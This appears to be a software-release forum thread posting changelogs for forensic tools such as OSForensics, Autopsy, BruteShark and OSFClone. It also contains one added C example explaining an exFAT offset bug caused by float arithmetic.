    Added right-click option to lookup IP addresses in e-mail headers and then mark on Map Viewer.
    Added "Overview" button to view email address statistics in email viewer. Can now get a quick count of Emails To / From each Email address.
    OSForensics will attempt to convert X.400/X.500 e-mail addresses by parsing the MIME headers if available
    Added support for indexing EMLX files from Apple Mail
    Fix overflow with long To/Cc/Bcc strings in mbox and dbx files. Fix missing single address summary icon. Add Top 10 contacts filter to sankey graph. Combine sankey graph and summary table when added to case

    Event Log Viewer:

    Added OSF generated event information as a summary string in quotation marks when viewing items in the event log viewer (for eg “Disconnected USB device "TOSHIBA External USB 3.0 " , Serial Number: XXX").

    File Name Search:

    Optimizations for improved scan speed and performance, especially when using the direct access mode (also called forensics mode).
    Reorganized UI for consistency and simplicity (convert to 'Sort' link, convert to 'Preset' link, move configuration text to tooltip for 'Config' link)
    Dynamically populate map view as files with GPS locations are found, and display image thumbnail (and file metadata) on mouseover of location while in map view
    Fix stack overflow crash due to large local string variables
    Changed search preset name ‘Windows Shortcut Files’ to ‘LNK Files’
    Updated the P2P pre-sets to include UseNet related keywords

    Hash Sets and Create Hash:

    Grouped the two modules into one main hashing module (File Hashing) with two tabs (Hash Sets & Create Hash).
    Added SHA3 (256, 512) as hash options

    Internal Viewer:

    Re-implemented thumbnails using global thumbnail cache for better performance. Increased number of thumbnails in lower bar to fill window width and added support for video thumbnails.
    Jump to file when double clicking thumbnail
    Add extracting of embedded thumbnails in image file within the 'Analyze' dialog. This can help with checking for image manipulation.
    When a file is fragmented on disk, viewer can display list of file fragments + right-click option to jump to fragment
    Improved drawing performance and navigation buttons.
    Hex view, add 'Export strings...' link to string extractor
    Initial support for viewing PDF files using native API in Win10. This allows faster more accurate PDF rendering in viewer.
    Display Office Documents (docx, xlsx, pptx, etc) and OpenDocument (odt, odp, odx) files as HTML.
    When analyzing images, add right-click menu options to embedded thumbnails to 'View with internal viewer...' and 'Add to Case'

    Mismatch Search:

    Restructured UI for consistency and simplicity.
    Fix bug with 0 byte files not being excluded from results

    Password Recovery:

    Restructured UI for consistency and simplicity.
    Distributed password cracking with support for Multiple GPUs (Pro Only). Supports up to 1000 total clients when using distributed cracking
    Fixed an issue with Firefox password recovery, a crash that could occur when parsing Firefox V31 and earlier versions passwords

    Program Artifacts:

    Restructured UI for consistency and simplicity.

    Raw Disk Viewer:

    Restructured UI for consistency and simplicity (move buttons to 'Actions' link, convert to 'Config' link, add search bar)

    System Information:

    Re-organized UI for simplicity and consistency (consolidate "Live acquisition" into combo box, convert into "command list" link).

    Thumbnail Viewer:

    Fixed drawing of images with alpha channel.

    Tag/Untag:

    Changed behaviour of Tagging Files. Keyboard Shortcut (Ctrl+T) applies to selected (not checked) files. The Checked Items Submenu will have options to Tag/Untag checked files by submenu selection only. This has been implemented in FileSystem Browser and Find Name Search.
    Ability to open some tagged items in the case manager, e.g. cookie tagged item. ‘Open internal viewer’ will open the SQLite database where cookie was stored.
    Items tagged in the User Activity modules will indicate they were added in this module in the Case Manager

    User Activity:

    Restructured UI for simplicity and consistency.
    Moved 'Remove filter' link to 'Activity Filters' drop down
    Added Anti-Forensics Artifacts to scan the traces of Anti-Forensics programs
    Search Terms, cut down on duplicate entries by using DISTINCT in SQL query
    Events, filtered out 4624 event when logon type is 5 (too many system generated events swamping others)
    Added Cryptocurrency Wallet Apps to scan artifacts of wallet applications installed on the system
    Fixed activity-specific right click menu options and enter/double click options
    Added support for parsing UseNet NZB files to display filename, file size, poster and time
    Added Newshosting UseNet client P2P artifacts
    Changed the tree-view “Most Recently Used” item to be collapsed by default
    Fixed crash with change to Autofill in Edge Chromium when data value in Sqlite DB is not encrypted.
    Added a 3 second display of message "User Activity Scan Finished - No items found" when no items are found
    Added more checks for cancelled scan when processing ESEDB databases so cancel will complete faster
    Added support to parse the BitTorrent .torrent file format to display its contents info like the filename, file size, and time
    Added scanning for WiFi passwords stored on the Windows system and display under the WLAN category
    Fixed an issue with Firefox password recovery, a crash that could occur when parsing Firefox V31 and earlier versions passwords
    Added support to collect details about recently viewed PDF files in Acrobat Reader and their file size and page numbers.
    Added an option in the config window to allow full scan of the selected drives, which will search Torrent and NZB files across the drives and parse them
    Added support to collect the VLC Media Player last opened filepath by parsing its .ini file

    Start Menu:

    Added search bar to the start page to quickly find OSF features

    Workflow:

    Set Mount Drive Image button to be hidden by default in the Workflow menu. This was done as the Add Device function is preferable in nearly all cases

    Python API:

    Add methods for adding/removing device from case (including BitLocker and Volume Shadow devices)

    Remote Server:

    Fix bug in creating destination folders when source path is a network folder

    Security:

    Update EXIFTool to 12.25 due to ACE security vulnerability

http://www.osforensics.com/
Titel: Autopsy 4.19.1
Beitrag von: SiLæncer am 10 August, 2021, 11:00
What's new:

    Bug Fixes:

    Fixed connection leak associated with creating OS Accounts
    Decreased priority of OS Account Content Viewer
    Misc bound check fixes in TSK

http://www.sleuthkit.org/autopsy
Titel: OSForensics 9.0.1001
Beitrag von: SiLæncer am 17 August, 2021, 19:00
Changelog
       
    Auto Triage:

    Fixed bug with loading user-specified logical image file type settings from config file

    Case Manager:

    New right click option in the case list to open the containing folder (in Windows Explorer).

    Clipboard Viewer:

    Changed linking of the WinRT shcore library for Win7 compatibility

    Disk Image:

    Cleaned up the word wrapping on message box warning

    Email Viewer:

    Increased size of 'To' and 'Cc' fields. Enabled word wrapping.

    Filesystem Support:

    Fixed bug in FAT entry offset calculation due to using float type. This caused incorrect offset calculation on exFAT file systems

    File Name Search:

    Added status window for adding files/folders to logical image to improve responsiveness when adding a large number of items

    Internal Viewer:

    When viewing PDF files earlier than Win8, use text conversion instead of native PDF viewer
    Changed linking of WinRT shcore library for Win7 compatibility
    Changed linking of WinRT Windows.Data.Pdf.dll library for Win7 compatibility

    Logical Image:

    Fixed performance issues when adding/removing sources when there are large number of existing items

    Password Recovery:

    Changed linking of OpenCL.dll to delay for Win7/8 compatibility

    Python API:

    Updated youtube-dl to newest version
    Added new Python script template for recursing directories in a file system, ignoring specified extensions and subdirectories

    Start Window:

    Search bar now searches as text is entered.
    Changed search to ignore word order, allow results for (n-1) search terms if no results, return help file if no results.
    Prevent certain search inputs that could cause unintended behaviour.

    WebBrowser:

    Updated web browser module to use webview2. On systems that support it (i.e. have chromium edge installed), the webview2 browser will be used, for systems without, will use the old browser control.
    Change linking of GetDpiForWindow for Win7 compatibility
    GUI Navigation/Icons should be less blurry
    Removed Save Page/Add to Case button/option (it is not implemented/supported by Webview2)
    Fixed issue with resizing browser window below minimum size and buttons moving out of place.
    Export Page, fixed possible bug when downloading a file/video fails causing OSForensics to crash.
    Changed default capture area (camera button) to Whole Page.
    GUI Added visible note to users notifying them that right click options (Save As and possibly Print) on webpages are not working due to webview2 running in elevated permissions as required by OSF.

http://www.osforensics.com/
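The exFAT bug noted under "Filesystem Support" above (an entry offset computed in a float type) is a class of defect worth seeing in code. The following is an added example, not OSForensics code (whose internals are not public): the geometry values are constructed, and the float variant is assumed to be the shape of the defect the changelog describes.

```c
#include <stdint.h>
#include <stdio.h>

/* Constructed exFAT geometry for this example (not read from any real volume).
 * The fields mirror the exFAT boot sector: sector and cluster sizes are stored
 * as power-of-two shifts, and the cluster heap offset is counted in sectors. */
typedef struct {
    uint8_t  bytes_per_sector_shift;    /* 9 -> 512-byte sectors              */
    uint8_t  sectors_per_cluster_shift; /* 8 -> 256 sectors = 128 KiB cluster */
    uint32_t cluster_heap_offset;       /* in sectors                         */
} exfat_geom;

#define DIR_ENTRY_SIZE 32u   /* every exFAT directory entry is 32 bytes */

/* Correct form: byte offset of directory entry `index` inside `cluster`,
 * using 64-bit integer arithmetic only. Cluster numbering starts at 2 in
 * the FAT family, so cluster 2 is the first cluster of the heap. */
uint64_t dir_entry_offset_u64(const exfat_geom *g, uint32_t cluster, uint32_t index) {
    uint64_t bps  = 1ull << g->bytes_per_sector_shift;
    uint64_t cs   = bps << g->sectors_per_cluster_shift;      /* cluster size in bytes */
    uint64_t heap = (uint64_t)g->cluster_heap_offset * bps;   /* heap start in bytes   */
    return heap + (uint64_t)(cluster - 2) * cs + (uint64_t)index * DIR_ENTRY_SIZE;
}

/* Buggy form (assumed shape of the defect): the same formula evaluated in
 * single-precision float. A float has a 24-bit significand, so above 16 MiB
 * the representable offsets are more than 1 byte apart; above 512 MiB they
 * are 64 bytes apart, which is wider than a whole directory entry. */
uint64_t dir_entry_offset_float(const exfat_geom *g, uint32_t cluster, uint32_t index) {
    float bps  = (float)(1u << g->bytes_per_sector_shift);
    float cs   = bps * (float)(1u << g->sectors_per_cluster_shift);
    float heap = (float)g->cluster_heap_offset * bps;
    float off  = heap + (float)(cluster - 2) * cs + (float)index * (float)DIR_ENTRY_SIZE;
    return (uint64_t)off;   /* the rounding already happened in the float ops above */
}

/* Returns 1 when both computations agree for this entry, 0 when the float
 * version would make a parser read a different (wrong) directory entry. */
int float_offset_is_exact(const exfat_geom *g, uint32_t cluster, uint32_t index) {
    return dir_entry_offset_u64(g, cluster, index) == dir_entry_offset_float(g, cluster, index);
}

int main(void) {
    /* Cluster heap 512 MiB into the volume: plausible for a large exFAT card. */
    exfat_geom big   = { 9, 8, 1048576u };
    /* Cluster heap 1 MiB into the volume: small enough that float stays exact. */
    exfat_geom small = { 9, 8, 2048u };

    for (uint32_t idx = 0; idx < 4; idx++) {
        printf("big   cluster 2 entry %u: u64=%llu float=%llu %s\n", idx,
               (unsigned long long)dir_entry_offset_u64(&big, 2, idx),
               (unsigned long long)dir_entry_offset_float(&big, 2, idx),
               float_offset_is_exact(&big, 2, idx) ? "ok" : "WRONG ENTRY");
        printf("small cluster 2 entry %u: %s\n", idx,
               float_offset_is_exact(&small, 2, idx) ? "ok" : "WRONG ENTRY");
    }
    return 0;
}
```

On the large geometry every odd-numbered entry resolves to a neighbouring entry's offset, which is how a forensic tool ends up attributing the wrong name or timestamps to a file.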
Titel: BruteShark 1.2.3
Beitrag von: SiLæncer am 01 September, 2021, 22:00
(https://i.postimg.cc/SKYnyNkt/screenshot-2749.png)
BruteShark is a Network Forensic Analysis Tool (NFAT) that performs deep processing and inspection of network traffic (mainly PCAP files). It includes: password extracting, building a network map, reconstructing TCP sessions, extracting hashes of encrypted passwords and even converting them to a Hashcat format in order to perform an offline brute-force attack.

License: GPLv3

What's new:

    Add "Clear Results" button (following #95).
    Bug fix - although a certain network interface was selected at the user interface, another network card was selected behind the scenes (following to #99, #100).
    Upgrade to SharpPcap 6.0.0 (better performance among other improvements).

https://github.com/odedshimon/BruteShark
Titel: OSForensics 9.0.1002
Beitrag von: SiLæncer am 08 September, 2021, 11:00
Changelog
       
Auto Triage

Support for saving compressed Case files (experimental)
Support for uploading Case files to FTP server (experimental)
Fixed UI mouseover issues

Case Manager

Support for importing compressed Case files (experimental)
Fixed an error that occurred when trying to create a case in a network path

Create / Search Index

Fix crash bug when indexing corrupted OLE files (OLE is used in old style XLS, DOC, PPT files)
Added export of "lastfailedindexcfg.zcfg" for debugging purposes when indexing fails
Fixed potential crash bug with buffer issues in indexer

Memory Viewer

When running from a network drive, the DirectIo driver is copied to a temporary directory before loading. This is required because Windows does not load device drivers from network drives.
When saving memory dump to network location, saves to temporary location before moving to network path

Start Window Search

Fixed home/end keys in text input
Added more search results

User Activity

Fixed potential memory buffer overflow crash in function on Win XP
Fixed a crash that could occur when collecting SRUM artifacts on Windows 11

Misc

Fixed crash when running from network drive
Update OpenSSL library in use to 1.1.1L. Previous version in use was v1.0.2L. This fixes a couple of potential security issues in OpenSSL.
Updated help documentation for internal viewer, E-mail viewer, map viewer, file name search map view, updated screenshots

http://www.osforensics.com/
Title: BruteShark 1.2.4
Post by: SiLæncer on 15 September, 2021, 22:00
Changelog

This version contains an implementation of a new network model.
That data structure's role is to store the current network state, including all the extracted items.
Apart from the fact that this refactor improves the readability and structure of the code, thanks to this data structure different display components can share information while remaining unaware of each other (e.g. the Network Map user control can now access DNS records if there are any).

Main Features:

    Network Map user control now has a control that describes the node details: open ports, DNS records, sessions count.
    The exported files include a new file named "BruteShark Network Nodes Data.json" that holds all the node details (following issue #77).
    Better performance.

https://github.com/odedshimon/BruteShark
Title: BruteShark 1.2.5
Post by: SiLæncer on 01 October, 2021, 10:00
Changelog

    This version contains a few improvements and features:

    First, the network map was upgraded by adding additional fields that give insights about domain users and the amount of data transferred from each point in the network:
    Sent data - The amount of data (bytes) sent by the host.
    Received data - The amount of data (bytes) received by the host.
    Domains - the domains that the host is a member of.
    Domain users - domain users that logged into the host.
    These fields will also appear in the "BruteShark Network Nodes Data.json" file that holds all the node details.

    Secondly, the BruteSharkDesktop installer file was upgraded:

    Allows upgrading an existing version of BruteSharkDesktop without the need to manually remove the old version.
    The license is also set at the installer prompt.

https://github.com/odedshimon/BruteShark
Title: OSForensics 9.1 Beta 3
Post by: SiLæncer on 08 November, 2021, 11:00
Changelog
       
Create / Search Index

    - Added "Save to disk" checked items menu option
    - Added "Uncheck all" menu option
    - Updated text for "Save to disk" option

Email Overview

    Fix overflow with long To/Cc/Bcc strings in mbox and dbx files. Fix missing single address summary icon. Add Top 10 contacts filter to sankey graph. Combine sankey graph and summary table when added to case.

File Name Search

    Updated the P2P presets to include UseNet related keywords

Logical Image

    Fixed a bug in creating destination folders when the source path is a network folder (e.g. \\holly\temp)

User Activity:

    Added an option in the config to allow full scan of the selected drives, which will search Torrent and NZB files across the drives and parse them


Changes for Beta 2:

OS Support

    Adding Windows 11 support.
    (at this point there is one open issue with parsing the am-cache data in Win11. All other modules should work in Win11)


Email Viewer

    Added single email summary and sankey graph
    Fixed buffer overflow when there are too many destination e-mail addresses

Email Overview

    Added email summary to case manager

User Activity

    Added feature to scan the Anti-Forensics artifacts from AppCompatFlags records.
    Added Desktop and Documents locations for P2P artifacts scan
    Added sub-category under P2P
    Updated P2P columns
    Restored 'User Activity - Summary' dialog box to tree right-click menu (to hide items in the tree view that have zero results)

ESEDB Viewer

    Fixed an issue where tree-view items are not loaded in the ESEDB Viewer if User Activity has not been initialized before
    Fixed an issue loading ESE Database files of Windows 11 Pro Version 21H2

File Name Search

    Fixed map view popup with incorrect width due to uninitialized variable
    Change alpha of map view popup thumbnail from 50% -> 100%

http://www.osforensics.com/
Title: OSForensics 9.1.1000
Post by: SiLæncer on 11 November, 2021, 11:00
Changelog
       
    * NEW JSON Viewer *
        Supports syntax highlighting for JSON documents
        Treeview shows the hierarchical dependencies between JSON nodes
        Supports JSON formatting and indenting
        Supports compressing (minifying) JSON documents
        Supports encoding: UTF8, ASCII, UTF16 BE/LE
    * NEW Remote Acquisition *
        Preliminary implementation of remote acquisition module
        Added encryption to configuration file. Prompt user for password when loading/saving config file
        Automatically import case when remote acquisition complete
        Support for domain user accounts
        Support for compressed Case File
    Auto Triage
        Fixed bug in FTP case file upload
        Added error messages when uploading of case file failed
        Save FTP config to OSF config file on close
        Fixed minor UI bug when hovering over triage tasks
        Refactor to support running without GUI (i.e. command line option)
        Added command line options to run Auto Triage in standalone mode
    Case Management
        Added Case Size column to the list of selectable cases. Size is calculated in background thread
        Added option to "Export to file" in "Export Case" button dropdown menu
    Create / Search Index
        Fixed crash bug when searching in index containing long file paths in the protected files list
    Deleted Files
        Fixed multiple device scanning
    Email Viewer
        Tiff Export, Moved tiff export menu item, changed emails md5 to sha1 and added attachments sha1, added tiff export progress to title bar
        Updated tiff export folder structure
        Updated load file format, added text extraction (using code from Zoom)
        Renamed concordance export option, removed debugging print
        Added right click option to export emails to concordance load file
    Forensic Imaging
        Improved image creation speed significantly
        Changed buffer sizes used to be 16MB by default and 256MB if there is greater than 6GB free system RAM, and changed the file access method, which results in much better performance on very fast drives
        Changed zlib library in use for 64bit build to the cloudflare fork for increased speed when compressing E01 images
        Changed AFF4 compression from using ZLIB to LZ4 which results in increased speed when creating the image
        Fixed a bug where selecting "None" for the hashing function was still creating an MD5 hash while creating the image resulting in a slower speed than expected
        Added CRC32-C to the available hashing options, an SSE4 enhanced version of CRC that is much faster
        Added hash outputs to create image tab
    Install to USB
        Added option to set the workflow to a minimal set of modules for portable OSF installations
        Allow installation of OSF portable to network folder
        Added option to include python packages
    Image Viewer
        Fixed possible bug where the thumbnails may not be displayed/extracted the second time the image is analyzed
    Password Recovery
        Fixed crash due to using freed OpenSSL structure
    Start Page
        Re-assigned Modules to different groups
        File System Browser moved to File Searching & Indexing
        Web Browser and Analyze Memory with Volatility moved to House Keeping
        Program Artifacts moved to System Artifacts & Passwords
        Changed "Install to USB" to "Install to USB or Network"
        Modules hidden in both the workflow menu and start page (via customize workflow) will have grey text and have the word [Hidden] appended when appearing in the Module Feature Search. Note: This does not prevent users from accessing these modules
    SQLite Browser
        Fixed bug where it opened the add to case dialog using the main window's handle instead of SQLite Browser's
        Fixed bug where it opened the file select dialog using the main window's handle instead of SQLite Browser's when selecting 'Load DB'
    User Activity
        Added Browser Custom Dictionary entries for Opera and Firefox.
        Added new Browser Custom Dictionary entries activity type. (Chrome, Chromium Edge, Opera, Firefox)
    Web Browser
        Capture Screenshot Region will capture upon left mouse up (previously required user to hit 'Enter' key)
    Web Capture
        Internal changes to better support timing out when a page fails to load, adding delays after page has completed loading before taking capture, setting the page scale
    Misc
        Updated Crypto++ library to 8.6.0

http://www.osforensics.com/
Title: OSForensics 9.1.1001
Post by: SiLæncer on 12 November, 2021, 19:00
What's new:

Remote Acquisition

Fixed error when network path contains spaces
Use XML config file to pass triage options rather than command line options
Fixed reporting of triage status for pre triage tasks (memory dump) and post triage tasks (HTML report, FTP upload)

Auto Triage

Refactored handling of logical image configuration

http://www.osforensics.com/
Title: Autopsy 4.19.2
Post by: SiLæncer on 12 November, 2021, 22:00
Changelog

GUI Updates:

Special handling of Interesting Files and Interesting Results analysis results was removed from the tree and they are now shown as individual nodes.
Updated display of analysis results in the tabular results viewer.
Improved algorithm for populating the S(core) column in the tabular results view.
Updated the right-click menu options for data artifacts and analysis results.
The O(ther Cases) column in the tabular results view and the Other Occurrences content viewer now count cases in the same way.

Misc:

Installed applications are now added to the central repository.
The Central Repository ingest module no longer uses the generic Interesting Item analysis result and instead creates more specific Previously Seen, Previously Unseen, and Previously Notable analysis results.
Automatic destinations (jump lists) parsing added to the Recent Activity module.
French translation of user documentation contributed by GitHub user @Seb2lyon.

Bug Fixes:

Analysis Results and Annotation content viewers now work when parent is a data artifact.
Fixed bug that prevented media attachments from being displayed in the Communications Viewer.
Fixed RegRipper bug to support parsing of ShellBags with non-Latin characters.
Assorted GUI responsiveness fixes.
Fixed NTFS handling of compressed files that were not fully initialized (via TSK).
Other assorted bug fixes.

http://www.sleuthkit.org/autopsy
Title: OSForensics 9.1.1002
Post by: SiLæncer on 19 November, 2021, 11:00
Changelog

Auto Triage:

Fixed stack overflow when attempting to calculate folder size for logical image
Updated info text for Logical Image Config Dialog Box
When loading previous config, re-prompt for FTP server password if non-anonymous upload is enabled

Android Logical Image:

Fixed bug where after imaging, OSForensics would fail to attach log to case "path not found"

Remote Acquisition:

When loading config file, re-prompt for FTP server password if non-anonymous upload is enabled
Added support for non-anonymous FTP upload without passing plain text password
Added check if portable install version matches current version
Fixed triage status file not being written when saving as compressed Case file format

Misc:

Fixed detection of OSForensics Portable for current running instance

http://www.osforensics.com/
Title: OSForensics 9.1.1003
Post by: SiLæncer on 02 December, 2021, 10:00
Changelog

    Case Management

        Fixed "Verify" option on case items not working correctly
        Fixed "Verify" option on case items without hash values not displaying an error message

    Deleted File Recovery

        Fixed bug, OSForensics will now proceed with File Carving (if enabled) even if the image file contains mixed file system partition types

    JSON Viewer

        Added right-click menu to view HTML format conversations using internal/system web browsers, also double-click to open browser
        Added TXT and CSV exporting options
        Added support to parse Google Hangouts archive JSON format file downloaded from Google Takeout. It provides a summary view of the Hangouts conversation history and allows export of the selected Hangouts conversations to HTML with nicely formatted chatting app-like style so users can easily read through the messages.
        Added right-click menu to export HTML files to case
        Removed Compress JSON button as it may cause crash on large files

    Remote Acquisition

        Fixed logical image creation on remote machine
        Delete temporary config file passed to remote machine when acquisition finished

    Start Window

        Fixed constant CPU usage due to redrawing

    Verify/Create Hash

        Fixed hash function not starting if "none" was selected for the secondary hash

http://www.osforensics.com/
Title: OSForensics 9.1.1004
Post by: SiLæncer on 09 December, 2021, 19:30
Changelog

    Case Management:

    Enhanced USB Write Block to block more kinds of removable storage devices

    Disk Image and Filesystem Support:

    APFS, added additional file system caching for better performance. Result was up to 30X performance improvement for file searching.
    Support for APFS Sealed Volumes
    APFS, handle compression algorithm 5

    File Viewer:

    Fixed hang when a file system read error occurs when attempting to generate thumbnails

    JSON Viewer:

    Added new feature to parse Google Location History JSON format archive file exported via Google Takeout service, shows a summary of the locations list.
    Selected locations can be exported in KML/GPX/CSV formats for use in applications like Google Earth, Google Maps My Maps and OSForensics Map Viewer.
    Updated right-click menu to view locations on internal Map Viewer.

    Web Capture:

    When downloading large videos the connection to the remote server could end with Windows error 10060 (connection drop) and/or 10054 (server terminated connection). Previous behaviour: OSForensics reported a failed download. Now if OSForensics detects that the download failed because of the above errors, it will attempt to retry the download (the download should continue where it left off). If it fails three (3) times, it will ask the user if they want to continue to retry or stop.

http://www.osforensics.com/
Title: OSForensics 9.1.1005
Post by: SiLæncer on 21 December, 2021, 10:00
Changelog

    Create / Search Index
        New indexer builds with updated support for APFS
    File Name Search
        Recognizes JSON (*.json) and Event Log (*.evtx) files and opens them with internal viewers
    JSON Viewer
        Added support to parse Google Chat record exported from Google Takeout service
        Can parse a single "messages.json" JSON format file or select to parse multiple files at once
        Same as the Hangouts, it shows the conversations in HTML with formatted chatting app-like style
        Fixed right-click Add to case menu, users can choose KML/GPX/CSV formats when adding selected items to case
    Manage Case
        Updated USB write-block message to differentiate when enabling and disabling the setting
    Raw Disk Viewer
        Fix handling of clusters for APFS "cloned" inodes that share clusters with other inodes

http://www.osforensics.com/
Title: OSForensics 9.1.1006
Post by: SiLæncer on 23 December, 2021, 11:00
Changelog
       
    Case Manager
        Added option to "Add to Case" when right click on multiple tagged items. OSForensics will add tagged files but warn and provide a list of tagged items that are references (e.g. artifact found within a database) that could not be added to case.
    Device Manager
        Added support for detecting hidden file systems on entire disk images. This allows for recovery of deleted partitions (depending on what remnants are left on disk)
    System information
        Updated hardware support to correctly report on DDR5 RAM and Intel 12th Gen CPUs with efficiency cores and performance cores
    Password Recovery
        Fixed bug causing columns in list view to disappear after user has configured the active columns, when a new case is loaded
    Misc
        For some modules that allow user to configure columns orders, added a "Defaults" button to allow user to reset the columns to OSF's default settings
        Added the Microsoft DLL, msvcp140_codecvt_ids.dll to installer as it is required by translate.exe, which is in turn used for viewing Word documents. But the DLL is missing in Win 7. The codecvt_ids DLL converts characters between different character sets.

http://www.osforensics.com/
Title: Autopsy 4.19.3
Post by: SiLæncer on 27 December, 2021, 22:00
Autopsy is a graphical interface to The Sleuth Kit and other analysis tools. It was designed to be an extensible platform so that it can be an end-to-end digital forensics solution that incorporates plug-in modules from both open and closed source projects. The application provides users with various analysis features and with the possibility of generating HTML or CSV reports as well.

License: GPL

Changelog

    Bug Fixes:

    Updates for log4j vulnerabilities.
    Solr 8.11.0 Upgrade
    Manual update of log4j to 2.16.0

http://www.sleuthkit.org/autopsy
Title: OSForensics 9.1.1007
Post by: SiLæncer on 24 January, 2022, 19:00
What's new:

    Case Manager:

    Support for adding recovered partitions to case

    Misc:

    Refresh physical disk info only when there is device change notification, to reduce costly re-scanning of physical disks
    Keep a single instance of physical disk info shared between all modules

http://www.osforensics.com/
Title: OSForensics 9.1.1008
Post by: SiLæncer on 27 January, 2022, 11:01
What's new:

    Disk Image and Filesystem Support
    Fixed HFS+ partitions being incorrectly identified as ext2

http://www.osforensics.com/
Title: OSForensics 9.1.1009
Post by: SiLæncer on 03 February, 2022, 11:00
Changelog


    Case Management:

    Fixed possible crash (crash was due to uncaught exception from MoveFile failure) when changing the case location in the Edit Case Details dialog when paths are longer than MAX_PATH

    Deleted Files:

    Cleaned up text/message for the Save Checked Deleted Files confirmation dialog
    Direct Image Access / Filesystem support
    NTFS, fixed bug in traversing $I30 entries in directories spanning multiple MFT records

    File Name Search:

    Enabled "Show $FILE_NAME Dates (NTFS)" configuration option automatically if any of the $FILE_NAME columns are selected when configuring displayed columns
    Fixed bug where the custom case directories a user can specify in the config settings did not get reset when switching between cases

    File System Browser:

    Fixed issue of FSB starting in extremely minimized state. Issue was caused if previous instance of FSB was minimized when closed. Now if closed while minimized, FSB will not save existing dimensions and reuse the last saved values

    File Viewer:

    Fixed bug where OSF crashed when trying to retrieve file info from a file that does not exist
    Fixed bug where if 'save file' option is used on a HFS file system and with 2 or more files selected, the saved file name was incorrectly output

    Mismatch Files Search:

    Updated help file to add more detail on how 'Filter Types' is used
    Fixed Chrome/Firefox Cache image exclusions (caches were in different places than expected, e.g. for Firefox, it is different based on OS)

    Search Index:

    Fixed bug where displayed sort options did not match function (email + attachments)

    Signatures:

    Will now clear create signature config (output type, hashes, etc) each time a new case is loaded

    User Activity:

    Fixed bug where all USB entries weren't displayed unless the "event log" option was selected as well
    Will now clear user activity config (date range etc) each time a new case is loaded

    Misc:

    Decreased the size of the Deleted Icon (X) overlay over image thumbnails
    Added .emlx to email pre-sets where used

http://www.osforensics.com/
Title: OSForensics 9.1.1010
Post by: SiLæncer on 24 March, 2022, 09:00
Changelog


    Boot VM

        Added more verbose debug logging when obtaining privileges to mount a registry hive
        Added check for whether VirtualBox extension pack is installed if USB 2.0 or USB 3.0 controller is selected

    Disk Image and Filesystem Support

        Fixed reading of volume bitmap failure due to sector unaligned access
        APFS, fixed bug causing buffer overflow when reading extended attributes (e.g. compressed files)
        APFS, fixed reading compressed file data for files with hard links
        APFS, fixed bug in decompressing zlib-compressed file data
        APFS, fixed reading of lzvn-compressed file data with updated implementation
        HFS+, fixed bug in decompressing zlib-compressed file data
        HFS+, support for reading lzvn-compressed file data stored in resource fork

    File Hashing

        NSRL import, the latest hash set (2.75 Dec 2021) contains an invalid character that was stopping the import from running correctly, this has now been fixed

    Help

        Added the Firefox/Chrome cache directories that are excluded when using the Chrome/Firefox exclude image cache file options in the Files Mismatch module

    Password Recovery

        Fixed issue with browse dialog not accepting multiple files correctly

    Screen Capture

        Fixed GDI handle leak when drawing button. This caused a leak when drawing windows containing the Screen Capture button (e.g. internal viewer)

    Search Index

        Fixed file handle leak
        Fixed GDI handle leak
        Fixed a bug that could occur on the off-chance that system time is the same for two searches

http://www.osforensics.com/
Title: OSForensics 9.1.1011
Post by: SiLæncer on 04 April, 2022, 06:00
Changelog


    Device Manager:

    Scan up to a maximum number of sectors when looking for recovered partitions. This prevents unbounded scanning of disks with a large amount of unpartitioned space

    Subscription:

    Fixed crash when checking subscription validity

http://www.osforensics.com/
Title: OSForensics 9.1.1012
Post by: SiLæncer on 06 April, 2022, 09:22
Changelog


    File system support:

    exFAT, removed check for volume attribute bit when traversing file entries, which appears to be set in macOS created volumes (which caused file sizes to appear as 0 and some directories to be hidden)

http://www.osforensics.com/
Title: OSFClone 1.3.1001
Post by: SiLæncer on 12 April, 2022, 10:30
OSFClone is a free, self-booting solution which enables you to create or clone exact raw disk images quickly and independent of the installed operating system.

In addition to raw disk images, OSFClone also supports imaging drives to the open Advanced Forensics Format (AFF). AFF is an open and extensible format to store disk images and associated metadata. An open standard enables investigators to quickly and efficiently use their preferred tools for drive analysis. After creating or cloning a disk image, you can mount the image with PassMark OSFMount before conducting analysis with PassMark OSForensics™.

OSFClone creates a forensic image of a disk, preserving any unused sectors, slack space, file fragmentation and undeleted file records from the original hard drive. Boot into OSFClone and create disk clones of FAT, NTFS, and USB-connected drives! OSFClone can be booted from CD/DVD drives, or from USB flash drives.

Freeware

What's new:

Updated Porteus Linux to V4.0 (Base Image, Porteus-XFCE-v4.0-x86_64.iso)

http://osforensics.com/tools/create-disk-images.html
Title: OSForensics 10.0 Beta 1
Post by: SiLæncer on 10 June, 2022, 19:00
Changelog


    Boot VM:

    Will now display a proper error message when booting from VirtualBox failed (e.g. when Intel VT-x/AMD-V is not enabled)
    Added check for whether VirtualBox extension pack is installed if USB 2.0 or USB 3.0 controller is selected
    Added check and display error for partition-only images without a supported OS before mounting as physical disk
    Added support for password bypass for Win 10/Server 2016 Builds 17763 and 19041 (via PEPassPass v1.2.3)

    Case Manager:

    Support for adding recovered partitions to case
    Added ability to save and load custom templates for evidence categories
    Added ability to rename case devices after they have been added
    Add Device, changed the default display name to include the date the shadow copy was taken.
    Report Generation, separated the HTML and PDF report options into different templates, no longer need to generate a HTML report to get a PDF copy
    Report Generation, added the details of OSForensics digital signature to generated reports
    Report Generation, updated "Link to case files" and "Copy files to report location" options to "Create Redacted Report" and "Create Full Length Report" to be more descriptive
    Report Generation, added ability to toggle the inclusion of signature certificate verification information in report generation dialog
    Report Generation, Added "Software Verification" link in report sidebar
    Report Generation, Added certificate verification information to non HTML reports
    Clipboard Viewer / ThumbCache Viewer:
    Will now draw checkerboard background for improved display of transparent images
    Improved drawing of images to reduce flickering

    Deleted Files:

    Updated to allow selecting MFT Only, MFT and Carving, or Carving Only
    MFT and Carving now enabled by default
    Added minimum size requirement for carved JPGs (126 bytes), GIFs (43 bytes), PNGs (68 bytes)
    Changed name Plist to Binary Plist and improved detection to limit false positives
    File carving, fixed possible crash when carving MP3 files
    File carving, improved MP3/JPG detection to cut down on the number of false positive results returned
    Added secondary sorting on second column (via dropdown and/or control click on details tab)
    Disabled sorting while deleted file scan is in progress
    Lowered priority level of carving threads to improve response from computer when carving is in progress
    Thumbnail Tab, added a quality level indicator to the thumbnails preview
    Added support for carving MFT file records on non-NTFS quick formatted volumes
    Added support for recovering files from carved MFT records. This enables recovery of files from a quick-formatted volume
    Added new scan method to config window, changed dropdown box to checkboxes.
    Prepend "Carved MFT" to 'Source String' of files recovered from carved MFT records to differentiate from normal deleted files
    Added check for large buffer sizes before allocating memory when detecting faces
